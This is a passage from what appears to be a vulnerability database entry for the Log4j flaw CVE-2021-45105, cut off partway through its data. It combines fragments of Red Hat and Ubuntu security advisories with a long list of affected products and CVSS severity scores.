x86_64: eap7-wildfly-openssl-el8-x86_64-2.2.0-2.Final_redhat_00002.1.el8eap.x86_64.rpm eap7-wildfly-openssl-el8-x86_64-debuginfo-2.2.0-2.Final_redhat_00002.1.el8eap.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2021-4104 https://access.redhat.com/security/cve/CVE-2021-44832 https://access.redhat.com/security/cve/CVE-2021-45046 https://access.redhat.com/security/cve/CVE-2021-45105 https://access.redhat.com/security/cve/CVE-2022-23302 https://access.redhat.com/security/cve/CVE-2022-23305 https://access.redhat.com/security/cve/CVE-2022-23307 https://access.redhat.com/security/updates/classification/#low https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/ https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYlRUqtzjgjWX9erEAQhXfxAApQ6HkBUo8Tg+GWEosSpAx0AEsVPMojWK HU3uJRF8jp0KXqchc+KVlalBJAWHPBUDr4xBpsISqwr7T/9iYonKlo4ijA/68b2K khbFyt6o6i2dXrYygT5fcMtukSjN2T/hfCc2ZE2yiHTO3Ou4AALyZ2xCyYtfSpuZ rZLVvgCWrnak2msgkoNl0/sZxnjw6b+ZJczKkq3QqPVWOYlV/Qdl5NGy16i0rbEo P1rWXJrOUlEBctJEs756cqeIJesYKHZqqPx/kHaNyzdxDh99hKGZx7oturscAN6e sPfSSdyd5jsOcWD7UlHV9ukoPQxf1ouVBa0qkpL0wCoR3GFF6Pls1bMEFzUoz3/R IwagVxsr38duK3isv34l6IQ+RP0oSWN0rgPUu69tAlEV+YwLgA5JUOpz1i7FTmXt l3i5+wMlo9Xc/Hy+j7unW8Do7s/i0YuFVTuM6H9KEITuFjgFA2tB9CpzoAFzWLk0 U8zCL80Rwy1wiMydSrLjtg3YUPB6ibh2NJ02O7R+bNhJ8bN4yuDuWkDqy4VdPXGp zhed3dZmYAXD9/x+mnfghcbJZwigzGT9Qv78zYafB3f8K7cEVEDJK3aZMOkkh9ca dcaLs5WRv8ZTytFPv+KGKRJ/cc/UHAvh8zumMZdVMp1oty/k/OYWhgaEJMWGQDCe UnHI/WwB37w= =eCh2 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Description:
Red Hat Single Sign-On 7.5 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. ========================================================================= Ubuntu Security Notice USN-5222-1 January 11, 2022
apache-log4j2 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 21.10
- Ubuntu 21.04
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
Summary:
Several security issues were fixed in Apache Log4j 2. This issue only affected Ubuntu 18.04 LTS. (CVE-2021-45105)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 21.10: liblog4j2-java 2.17.1-0.21.10.1
Ubuntu 21.04: liblog4j2-java 2.17.1-0.21.04.1
Ubuntu 20.04 LTS: liblog4j2-java 2.17.1-0.20.04.1
Ubuntu 18.04 LTS: liblog4j2-java 2.12.4-0ubuntu0.1
In general, a standard system update will make all the necessary changes. Solution:
For OpenShift Container Platform 4.6 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html
4
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-202112-1782", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "retail order broker", scope: "eq", trust: 1, vendor: "oracle", version: "16.0", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3", }, { model: "e-business suite", scope: "eq", trust: 1, vendor: "oracle", version: "12.2", }, { model: "insurance insbridge rating and underwriting", scope: "eq", trust: 1, vendor: "oracle", version: "5.2.0", }, { model: "flexcube universal banking", scope: "eq", trust: 1, vendor: "oracle", version: "14.5", }, { model: "primavera gateway", scope: "gte", trust: 1, vendor: "oracle", version: "18.8.0", }, { model: "network security manager", scope: "gte", trust: 1, vendor: "sonicwall", version: "2.0", }, { model: "retail order broker", scope: "eq", trust: 1, vendor: "oracle", version: "19.1", }, { model: "banking enterprise default management", scope: "eq", trust: 1, vendor: "oracle", version: "2.12.0", }, { model: "communications cloud native core network repository function", scope: "eq", trust: 1, vendor: "oracle", version: "1.15.1", }, { model: "web application firewall", scope: "lt", trust: 1, vendor: "sonicwall", version: "3.1.0", }, { model: "webcenter sites", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "log4j", scope: "lt", trust: 1, vendor: "apache", version: "2.12.3", }, { model: "communications interactive session recorder", scope: "eq", trust: 1, vendor: "oracle", version: "6.4", }, { model: "email security", scope: "lte", trust: 1, vendor: "sonicwall", version: "10.0.12", }, { model: "retail store inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3.8", }, { model: "communications diameter signaling router", scope: "lte", trust: 1, vendor: "oracle", version: "8.5.1.0", }, { model: "hyperion infrastructure technology", scope: "lt", trust: 1, vendor: "oracle", version: "11.2.8.0", }, { model: "retail store inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.3.7", }, { model: "agile engineering data management", scope: "eq", trust: 1, vendor: "oracle", version: "6.2.1.0", }, { model: "flexcube universal banking", scope: "lte", trust: 1, vendor: "oracle", version: "12.4", }, { model: "health sciences empirica signal", scope: "eq", trust: 1, vendor: "oracle", version: "9.2.0.0", }, { model: "retail financial integration", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3.1", }, { model: "primavera unifier", scope: "eq", trust: 1, vendor: "oracle", version: "19.12", }, { model: "retail order management system", scope: "eq", trust: 1, vendor: "oracle", version: "19.5", }, { model: "insurance insbridge rating and underwriting", scope: "eq", trust: 1, vendor: "oracle", version: "5.6.1.0", }, { model: "communications service broker", scope: "eq", trust: 1, vendor: "oracle", version: "6.2", }, { model: "banking treasury management", scope: "eq", trust: 1, vendor: "oracle", version: "14.5", }, { model: "sql developer", scope: "lt", trust: 1, vendor: "oracle", version: "21.4.2", }, { model: "primavera unifier", scope: "eq", trust: 1, vendor: "oracle", version: "18.8", }, { model: "utilities framework", scope: "lte", trust: 1, vendor: "oracle", version: "4.3.0.6.0", }, { model: "management cloud engine", scope: "eq", trust: 1, vendor: "oracle", version: "1.5.0", }, { model: "primavera gateway", scope: "lte", trust: 1, vendor: "oracle", version: "18.8.13", }, { model: "retail data extractor for merchandising", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.2", }, { model: "retail data extractor for merchandising", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.2", }, { model: "communications cloud native core console", scope: "eq", trust: 1, vendor: "oracle", version: "1.9.0", }, { model: "log4j", scope: "gte", trust: 1, vendor: "apache", version: "2.13.0", }, { model: "instantis enterprisetrack", scope: "eq", trust: 1, vendor: "oracle", version: "17.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 1, vendor: "oracle", version: "21.12.0.0", }, { model: "healthcare foundation", scope: "lte", trust: 1, vendor: "oracle", version: "7.3.0.4", }, { model: "retail service backbone", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3", }, { model: "banking platform", scope: "eq", trust: 1, vendor: "oracle", version: "2.6.2", }, { model: "communications user data repository", scope: "eq", trust: 1, vendor: "oracle", version: "12.4", }, { model: "communications unified inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "7.3.5", }, { model: "financial services model management and governance", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.1.0.0", }, { model: "flexcube universal banking", scope: "gte", trust: 1, vendor: "oracle", version: "14.0.0", }, { model: "insurance insbridge rating and underwriting", scope: "gte", trust: 1, vendor: "oracle", version: "5.4", }, { model: "communications services gatekeeper", scope: "eq", trust: 1, vendor: "oracle", version: "7.0", }, { model: "6bk1602-0aa32-0tp0", scope: "lt", trust: 1, vendor: "sonicwall", version: "2.7.0", }, { model: "health sciences empirica signal", scope: "eq", trust: 1, vendor: "oracle", version: "9.1.0.6", }, { model: "payment interface", scope: "eq", trust: 1, vendor: "oracle", version: "20.3", }, { model: "retail integration bus", scope: "gte", trust: 1, vendor: "oracle", version: "19.0.0", }, { model: "communications element manager", scope: "lt", trust: 1, vendor: "oracle", version: "9.0", }, { model: "agile plm mcad connector", scope: "eq", trust: 1, vendor: "oracle", version: "3.6", }, { model: "retail invoice matching", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.3", }, { model: "health sciences inform", scope: "eq", trust: 1, vendor: "oracle", version: "7.0.0.0", }, { model: "primavera gateway", scope: "eq", trust: 1, vendor: "oracle", version: "21.12.0", }, { model: "enterprise manager for peoplesoft", scope: "eq", trust: 1, vendor: "oracle", version: "13.4.1.1", }, { model: "retail predictive application server", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3.46", }, { model: "communications cloud native core unified data repository", scope: "eq", trust: 1, vendor: "oracle", version: "1.15.0", }, { model: "log4j", scope: "lt", trust: 1, vendor: "apache", version: "2.3.1", }, { model: "insurance data gateway", scope: "eq", trust: 1, vendor: "oracle", version: "1.0.1", }, { model: "communications ip service activator", scope: "eq", trust: 1, vendor: "oracle", version: "7.4.0", }, { model: "primavera gateway", scope: "lte", trust: 1, vendor: "oracle", version: "20.12.7", }, { model: "retail eftlink", scope: "eq", trust: 1, vendor: "oracle", version: "20.0.1", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3.1", }, { model: "retail merchandising system", scope: "eq", trust: 1, vendor: "oracle", version: "19.0.1", }, { model: "retail financial integration", scope: "eq", trust: 1, vendor: "oracle", version: "19.0.0", }, { model: "retail store inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3.14", }, { model: "communications diameter signaling router", scope: "gte", trust: 1, vendor: "oracle", version: "8.3.0.0", }, { model: "communications evolved communications application server", scope: "eq", trust: 1, vendor: "oracle", version: "7.1", }, { model: "primavera gateway", scope: "gte", trust: 1, vendor: "oracle", version: "19.12.0", }, { model: "retail price management", scope: "eq", trust: 1, vendor: "oracle", version: "13.2", }, { model: "retail price management", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3.0", }, { model: "communications cloud native core service communication proxy", scope: "eq", trust: 1, vendor: "oracle", version: "1.15.0", }, { model: "communications cloud native core security edge protection proxy", scope: "eq", trust: 1, vendor: "oracle", version: "1.7.0", }, { model: "retail store inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3.5", }, { model: "communications pricing design center", scope: "eq", trust: 1, vendor: "oracle", version: "12.0.0.4", }, { model: "siebel ui framework", scope: "lte", trust: 1, vendor: "oracle", version: "21.12", }, { model: "retail eftlink", scope: "eq", trust: 1, vendor: "oracle", version: "21.0.0", }, { model: "flexcube universal banking", scope: "eq", trust: 1, vendor: "oracle", version: "11.83.3", }, { model: "payment interface", scope: "eq", trust: 1, vendor: "oracle", version: "19.1", }, { model: "retail merchandising system", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.3", }, { model: "communications convergent charging controller", scope: "gte", trust: 1, vendor: "oracle", version: "12.0.1.0.0", }, { model: "linux", scope: "eq", trust: 1, vendor: "debian", version: "10.0", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "retail point-of-service", scope: "eq", trust: 1, vendor: "oracle", version: "14.1", }, { model: "health sciences information manager", scope: "gte", trust: 1, vendor: "oracle", version: "3.0.1", }, { model: "log4j", scope: "lte", trust: 1, vendor: "apache", version: "2.16.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "lte", trust: 1, vendor: "oracle", version: "19.12.18.0", }, { model: "healthcare translational research", scope: "eq", trust: 1, vendor: "oracle", version: "4.1.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "gte", trust: 1, vendor: "oracle", version: "20.12.0.0", }, { model: "utilities framework", scope: "gte", trust: 1, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 1, vendor: "oracle", version: "4.4.0.2.0", }, { model: "webcenter portal", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "managed file transfer", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 1, vendor: "oracle", version: "8.58", }, { model: "autovue for agile product lifecycle management", scope: "eq", trust: 1, vendor: "oracle", version: "21.0.2", }, { model: "communications cloud native core network function cloud native environment", scope: "eq", trust: 1, vendor: "oracle", version: "1.10.0", }, { model: "hyperion planning", scope: "lt", trust: 1, vendor: "oracle", version: "11.2.8.0", }, { model: "banking platform", scope: "eq", trust: 1, vendor: "oracle", version: "2.7.1", }, { model: "retail eftlink", scope: "eq", trust: 1, vendor: "oracle", version: "17.0.2", }, { model: "business intelligence", scope: "eq", trust: 1, vendor: "oracle", version: "5.5.0.0.0", }, { model: "data integrator", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "retail service backbone", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3.1", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "19.0.1", }, { model: "log4j", scope: "gte", trust: 1, vendor: "apache", version: "2.4", }, { model: "flexcube universal banking", scope: "lte", trust: 1, vendor: "oracle", version: "14.3.0", }, { model: "communications network charging and control", scope: "eq", trust: 1, vendor: "oracle", version: "6.0.1.0.0", }, { model: "communications cloud native core policy", scope: "eq", trust: 1, vendor: "oracle", version: "1.15.0", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 1, vendor: "oracle", version: "8.59", }, { model: "communications session report manager", scope: "lt", trust: 1, vendor: "oracle", version: "9.0", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "19.0.0", }, { model: "enterprise manager for peoplesoft", scope: "eq", trust: 1, vendor: "oracle", version: "13.5.1.1", }, { model: "communications webrtc session controller", scope: "eq", trust: 1, vendor: "oracle", version: "7.2.1", }, { model: "primavera gateway", scope: "gte", trust: 1, vendor: "oracle", version: "20.12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "lte", trust: 1, vendor: "oracle", version: "20.12.12.0", }, { model: "financial services analytical applications infrastructure", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "retail financial integration", scope: "lte", trust: 1, vendor: "oracle", version: "16.0.3", }, { model: "identity manager connector", scope: "eq", trust: 1, vendor: "oracle", version: "9.1.0", }, { model: "retail financial integration", scope: "gte", trust: 1, vendor: "oracle", version: "16.0.1", }, { model: "insurance insbridge rating and underwriting", scope: "lte", trust: 1, vendor: "oracle", version: "5.6.0.0", }, { model: "identity management suite", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "retail financial integration", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3.2", }, { model: "hyperion profitability and cost management", scope: "lt", trust: 1, vendor: "oracle", version: "11.2.8.0", }, { model: "retail service backbone", scope: "gte", trust: 1, vendor: "oracle", version: "16.0.1", }, { model: "communications webrtc session controller", scope: "eq", trust: 1, vendor: "oracle", version: "7.2.0.0", }, { model: "retail predictive application server", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3.115", }, { model: "retail price management", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3.0", }, { model: "retail predictive application server", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.3.240", }, { model: "instantis enterprisetrack", scope: "eq", trust: 1, vendor: "oracle", version: "17.1", }, { model: "banking deposits and lines of credit servicing", scope: "eq", trust: 1, vendor: "oracle", version: "2.12.0", }, { model: "communications pricing design center", scope: "eq", trust: 1, vendor: "oracle", version: "12.0.0.5", }, { model: "retail price management", scope: "eq", trust: 1, vendor: "oracle", version: "14.0.4", }, { model: "banking payments", scope: "eq", trust: 1, vendor: "oracle", version: "14.5", }, { model: "primavera gateway", scope: "gte", trust: 1, vendor: "oracle", version: "17.12.0", }, { model: "retail integration bus", scope: "gte", trust: 1, vendor: "oracle", version: "16.0.1", }, { model: "utilities framework", scope: "eq", trust: 1, vendor: "oracle", version: "4.4.0.3.0", }, { model: "retail customer insights", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.2", }, { model: "communications session route manager", scope: "lt", trust: 1, vendor: "oracle", version: "9.0", }, { model: "banking enterprise default management", scope: "eq", trust: 1, vendor: "oracle", version: "2.7.1", }, { model: "health sciences information manager", scope: "lte", trust: 1, vendor: "oracle", version: "3.0.4", }, { model: "cloud manager", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "webcenter sites", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "health sciences inform", scope: "eq", trust: 1, vendor: "oracle", version: "6.2.1.1", }, { model: "jdeveloper", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "retail service backbone", scope: "eq", trust: 1, vendor: "oracle", version: "19.0.1", }, { model: "retail integration bus", scope: "lte", trust: 1, vendor: "oracle", version: "16.0.3", }, { model: "utilities framework", scope: "eq", trust: 1, vendor: "oracle", version: "4.4.0.0.0", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3.2", }, { model: "retail order broker", scope: "eq", trust: 1, vendor: "oracle", version: "18.0", }, { model: "hospitality token proxy service", scope: "eq", trust: 1, vendor: "oracle", version: "19.2", }, { model: "retail price management", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.3.0", }, { model: "primavera unifier", scope: "eq", trust: 1, vendor: "oracle", version: "21.12", }, { model: "instantis enterprisetrack", scope: "eq", trust: 1, vendor: "oracle", version: "17.2", }, { model: "healthcare master person index", scope: "eq", trust: 1, vendor: "oracle", version: "5.0.1", }, { model: "communications asap", scope: "eq", trust: 1, vendor: "oracle", version: "7.3", }, { model: "retail eftlink", scope: "eq", trust: 1, vendor: "oracle", version: "18.0.1", }, { model: "communications convergence", scope: "eq", trust: 1, vendor: "oracle", version: "3.0.3.0", }, { model: "agile plm", scope: "eq", trust: 1, vendor: "oracle", version: "9.3.6", }, { model: "linux", scope: "eq", trust: 1, vendor: "debian", version: "11.0", }, { model: "banking party management", scope: "eq", trust: 1, vendor: "oracle", version: "2.7.0", }, { model: "communications convergent charging controller", scope: "eq", trust: 1, vendor: "oracle", version: "6.0.1.0.0", }, { model: "communications network charging and control", scope: "lte", trust: 1, vendor: "oracle", version: "12.0.4.0.0", }, { model: "communications unified inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "7.4.1", }, { model: "6bk1602-0aa42-0tp0", scope: "lt", trust: 1, vendor: "sonicwall", version: "2.7.0", }, { model: "hyperion bi\\+", scope: "lt", trust: 1, vendor: "oracle", version: "11.2.8.0", }, { model: "communications cloud native core network repository function", scope: "eq", trust: 1, vendor: "oracle", version: "1.15.0", }, { model: "retail integration bus", scope: "lte", trust: 1, vendor: "oracle", version: "19.0.1.0", }, { model: "health sciences inform", scope: "eq", trust: 1, vendor: "oracle", version: "6.3.2.1", }, { model: "communications billing and revenue management", scope: "eq", trust: 1, vendor: "oracle", version: "12.0.0.4", }, { model: "communications eagle element management system", scope: "eq", trust: 1, vendor: "oracle", version: "46.6", }, { model: "retail service backbone", scope: "lte", trust: 1, vendor: "oracle", version: "16.0.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "gte", trust: 1, vendor: "oracle", version: "19.12.0.0", }, { model: "communications convergent charging controller", scope: "lte", trust: 1, vendor: "oracle", version: "12.0.4.0.0", }, { model: "banking trade finance", scope: "eq", trust: 1, vendor: "oracle", version: "14.5", }, { model: "healthcare foundation", scope: "gte", trust: 1, vendor: "oracle", version: "7.3.0.1", }, { model: "retail service backbone", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3.2", }, { model: "web application firewall", scope: "gte", trust: 1, vendor: "sonicwall", version: "3.0.0", }, { model: "retail central office", scope: "eq", trust: 1, vendor: "oracle", version: "14.1", }, { model: "6bk1602-0aa12-0tp0", scope: "lt", trust: 1, vendor: "sonicwall", version: "2.7.0", }, { model: "communications network charging and control", scope: "gte", trust: 1, vendor: "oracle", version: "12.0.1.0.0", }, { model: "network security manager", scope: "lt", trust: 1, vendor: "sonicwall", version: "3.0", }, { model: "retail customer insights", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.2", }, { model: "retail service backbone", scope: "eq", trust: 1, vendor: "oracle", version: "19.0.1.0", }, { model: "retail back office", scope: "eq", trust: 1, vendor: "oracle", version: "14.1", }, { model: "healthcare translational research", scope: "eq", trust: 1, vendor: "oracle", version: "4.1.1", }, { model: "retail store inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "14.0.4.13", }, { model: "flexcube universal banking", scope: "gte", trust: 1, vendor: "oracle", version: "12.1.0", }, { model: "log4j", scope: "gte", trust: 1, vendor: "apache", version: "2.0", }, { model: "hospitality suite8", scope: "eq", trust: 1, vendor: "oracle", version: "8.13.0", }, { model: "primavera gateway", scope: "lte", trust: 1, vendor: "oracle", version: "17.12.11", }, { model: "retail eftlink", scope: "eq", trust: 1, vendor: "oracle", version: "19.0.1", }, { model: "communications convergence", scope: "eq", trust: 1, vendor: "oracle", version: "3.0.2.2.0", }, { model: "retail invoice matching", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3", }, { model: "webcenter portal", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "retail service backbone", scope: "eq", trust: 1, vendor: "oracle", version: "19.0.0", }, { model: "banking loans servicing", scope: "eq", trust: 1, vendor: "oracle", version: "2.12.0", }, { model: "hospitality suite8", scope: "eq", trust: 1, vendor: "oracle", version: "8.14.0", }, { model: "communications cloud native core network slice selection function", scope: "eq", trust: 1, vendor: "oracle", version: "1.8.0", }, { model: "communications eagle ftp table base retrieval", scope: "eq", trust: 1, vendor: "oracle", version: "4.5", }, { model: "financial services analytical applications infrastructure", scope: "lte", trust: 1, vendor: "oracle", version: "8.1.1", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "communications performance intelligence center", scope: "eq", trust: 1, vendor: "oracle", version: "10.4.0.3", }, { model: "enterprise manager base platform", scope: "eq", trust: 1, vendor: "oracle", version: "13.4.0.0", }, { model: "hyperion data relationship management", scope: "lt", trust: 1, vendor: "oracle", version: "11.2.8.0", }, { model: "financial services model management and governance", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.8.0.0", }, { model: "healthcare data repository", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.1", }, { model: "mysql enterprise monitor", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.29", }, { model: "identity management suite", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "retail store inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3.3", }, { model: "retail eftlink", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.3", }, { model: "primavera gateway", scope: "lte", trust: 1, vendor: "oracle", version: "19.12.12", }, { model: "retail returns management", scope: "eq", trust: 1, vendor: "oracle", version: "14.1", }, { model: "communications billing and revenue management", scope: "eq", trust: 1, vendor: "oracle", version: "12.0.0.5", }, { model: "6bk1602-0aa52-0tp0", scope: "lt", trust: 1, vendor: "sonicwall", version: "2.7.0", }, { model: "banking platform", scope: "eq", trust: 1, vendor: "oracle", version: "2.12.0", }, { model: "communications messaging server", scope: "eq", trust: 1, vendor: "oracle", version: "8.1", }, { model: "communications unified inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "7.4.2", }, { model: "managed file transfer", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.1.0.0", }, { model: "financial services model management and governance", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0.0.0", }, { model: "communications interactive session recorder", scope: "eq", trust: 1, vendor: "oracle", version: "6.3", }, { model: "primavera unifier", scope: "eq", trust: 1, vendor: "oracle", version: "20.12", }, { model: "data integrator", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 1, vendor: "oracle", version: "12.4.0.0", }, { model: "taleo platform", scope: "lt", trust: 1, vendor: "oracle", version: "22.1", }, { model: "communications network integrity", scope: "eq", trust: 1, vendor: "oracle", version: "7.3.6", }, { model: "retail financial integration", scope: "eq", trust: 1, vendor: "oracle", version: "19.0.1", }, { model: "enterprise manager base platform", scope: "eq", trust: 1, vendor: "oracle", version: "13.5.0.0", }, { model: "6bk1602-0aa22-0tp0", scope: "lt", trust: 1, vendor: "sonicwall", version: "2.7.0", }, { model: "hyperion tax provision", scope: "lt", trust: 1, vendor: "oracle", version: "11.2.8.0", }, { model: "log4j", scope: null, trust: 0.7, vendor: "apache", version: null, }, ], sources: [ { db: "ZDI", id: "ZDI-21-1541", }, { db: "NVD", id: "CVE-2021-45105", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Guy Lederfein of Trend Micro Security Research", sources: [ { db: "ZDI", id: "ZDI-21-1541", }, ], trust: 0.7, }, cve: "CVE-2021-45105", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 4.3, confidentialityImpact: "NONE", exploitabilityScore: 8.6, id: "CVE-2021-45105", impactScore: 2.9, integrityImpact: "NONE", severity: "MEDIUM", trust: 1.1, vectorString: "AV:N/AC:M/Au:N/C:N/I:N/A:P", version: "2.0", }, { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 4.3, confidentialityImpact: "NONE", exploitabilityScore: 8.6, id: "VHN-408743", impactScore: 2.9, integrityImpact: "NONE", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:M/AU:N/C:N/I:N/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "HIGH", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", exploitabilityScore: 2.2, id: "CVE-2021-45105", impactScore: 3.6, integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1, userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, { attackComplexity: "LOW", attackVector: "NETWORK", author: "ZDI", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", exploitabilityScore: 3.9, id: "CVE-2021-45105", impactScore: 1.4, integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 0.7, userInteraction: "NONE", vectorString: "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2021-45105", trust: 1, value: "MEDIUM", }, { author: "ZDI", id: "CVE-2021-45105", trust: 0.7, value: "MEDIUM", }, { author: 